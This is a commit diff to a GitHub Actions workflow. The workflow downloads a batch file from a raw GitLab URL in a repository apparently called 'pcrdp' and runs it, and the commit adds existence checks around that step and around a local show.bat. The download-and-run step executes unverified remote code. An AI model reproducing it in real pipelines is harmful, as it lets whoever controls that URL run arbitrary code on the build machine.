Update main.yml

diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -11,9 +11,24 @@ jobs:
 
     steps:
       - name: Downloading & Installing Essentials
+        shell: pwsh
         run: |
+          Write-Host "Downloading .bat file..."
           Invoke-WebRequest -Uri "https://gitlab.com/raposabtry/pcrdp/-/raw/main/Downloads.bat" -OutFile "Downloads.bat"
-          cmd /c Downloads.bat
+          if (Test-Path "Downloads.bat") {
+            Write-Host "File downloaded. Running Downloads.bat..."
+            Start-Process -FilePath "Downloads.bat" -Wait
+          } else {
+            Write-Error "Failed to download Downloads.bat"
+            exit 1
+          }
 
       - name: Show Website
-        run: cmd /c show.bat
+        shell: cmd
+        run: |
+          if exist show.bat (
+            call show.bat
+          ) else (
+            echo show.bat not found.
+            exit 1
+          )
